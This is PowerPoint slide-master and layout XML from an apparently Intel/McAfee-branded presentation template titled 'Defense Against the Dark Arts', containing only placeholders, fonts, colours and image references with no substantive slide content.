              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 2" descr="Intel_McAfee_Security_horiz"/>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5517" y="133350"/>
            <a:ext cx="1886084"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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4781550"/>
            <a:ext cx="1393843" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Defense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Against</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Dark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Arts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 2" descr="C:\Users\Consultant\Desktop\tag.png (1)\tag3.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657600" y="0"/>
            <a:ext cx="1435100" cy="15271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033" name="Picture 9"/>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37" r="937" b="37156"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="790574"/>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09600" y="325163"/>
            <a:ext cx="6556672" cy="570187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="579613" y="971550"/>
            <a:ext cx="7072138" cy="3733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2" descr="Intel_McAfee_Security_horiz"/>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97272" y="4665062"/>
            <a:ext cx="1194328" cy="38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userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4781550"/>
            <a:ext cx="1381019" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:rPr>
              <a:t>Defense  Against  the  Dark  Arts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943601" y="4848225"/>
            <a:ext cx="1600200" cy="161925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="68589" tIns="34295" rIns="68589" bIns="34295" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{5A1DC566-6DD8-4E64-B54C-9F29185D0E2F}" type="datetime2">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Wednesday, January 7, 15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="4854475"/>
            <a:ext cx="336550" cy="161925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="68589" tIns="34295" rIns="68589" bIns="34295" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="800"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{659A5FE0-7283-4E23-82C6-1CCE5B0C9659}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 2" descr="C:\Users\Consultant\Desktop\tag.png (1)\tag3.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470900" y="0"/>
            <a:ext cx="673100" cy="716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extBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4781550"/>
            <a:ext cx="1381019" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:defPPr>
              <a:defRPr lang="en-US"/>
            </a:defPPr>
            <a:lvl1pPr>
              <a:defRPr sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Amienne" panose="04000508060000020003" pitchFamily="82" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>Defense  Against  the  Dark  Arts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="Intel_McAfee_Security_horiz"/>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200" y="89476"/>
            <a:ext cx="1712899" cy="55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a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1249406" y="1131163"/>
            <a:ext cx="6693244" cy="1079365"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3720"/>
              </a:lnSpc>
              <a:defRPr sz="3000" b="0" i="0" cap="all" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="B71234"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:cs typeface="Franklin Gothic Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Title of Presentation </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>FRANKLIN GOTHIC MEDIUM 30PT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1249407" y="2174097"/>
            <a:ext cx="6700108" cy="394222"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" baseline="0">
                <a:solidFill>
                  <a:srgbClr val="8E99A0"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:cs typeface="Franklin Gothic Medium"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Subtitle of Presentation Franklin Gothic Medium 16pt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1105931" y="919893"/>
            <a:ext cx="6954108" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Connector 16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1105931" y="2712994"/>
            <a:ext cx="6954108" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1">
                <a:lumMod val="60000"/>
                <a:lumOff val="40000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 2" descr="C:\Users\Consultant\Desktop\tag.png (1)\tag3.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470900" y="0"/>
            <a:ext cx="673100" cy="716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with subhea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57200" y="918371"/>
            <a:ext cx="7501466" cy="250029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:tabLst>
                <a:tab pos="230179" algn="l"/>
                <a:tab pos="342886" algn="l"/>
              </a:tabLst>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="180975"/>
            <a:ext cx="7501466" cy="730252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1379538"/>
            <a:ext cx="8221980" cy="3254375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="45718" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8760612" y="4869757"/>
            <a:ext cx="230989" cy="154577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EEB8B06D-99A5-468B-806E-293788FE9637}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4857750"/>
            <a:ext cx="6802415" cy="152400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="800">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Footer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="4667254"/>
            <a:ext cx="6804025" cy="152400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Source</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 2" descr="C:\Users\Consultant\Desktop\tag.png (1)\tag3.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470900" y="0"/>
            <a:ext cx="673100" cy="71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0489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alpha val="0"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="36000">
              <a:srgbClr val="8E99A0">
                <a:alpha val="0"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="D1D4D3"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="10800000" scaled="0"/>
        </a:gradFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114693" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="631825" y="472802"/>
            <a:ext cx="6134101" cy="570187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91377" tIns="45689" rIns="91377" bIns="45689" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="soft" dir="t"/>
            </a:scene3d>
            <a:sp3d extrusionH="44450" contourW="12700">
              <a:bevelT w="38100" h="38100"/>
              <a:bevelB w="38100" h="38100"/>
              <a:contourClr>
                <a:schemeClr val="tx1">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="60000"/>
                </a:schemeClr>
              </a:contourClr>
            </a:sp3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114694" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="578599" y="1574338"/>
            <a:ext cx="7073151" cy="3018300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91377" tIns="45689" rIns="91377" bIns="45689" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="172921" lvl="0" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Click to edit Master text styles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="1" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Second level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="2" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Third level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="3" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fourth level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="172921" lvl="4" indent="-172921" algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fifth level</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="512905" y="4793904"/>
            <a:ext cx="607326" cy="2159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a:defRPr sz="800">
                <a:solidFill>
                  <a:srgbClr val="A5ACAF"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{659A5FE0-7283-4E23-82C6-1CCE5B0C965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xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med">
    <p:wipe dir="r"/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
  <p:hf sldNum="0" hdr="0" ftr="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" fontAlgn="base" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="95000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr lang="en-US" sz="2100" b="0" i="0" cap="all" baseline="0" dirty="0" smtClean="0">
          <a:solidFill>
            <a:srgbClr val="8E99A0"/>
          </a:solidFill>
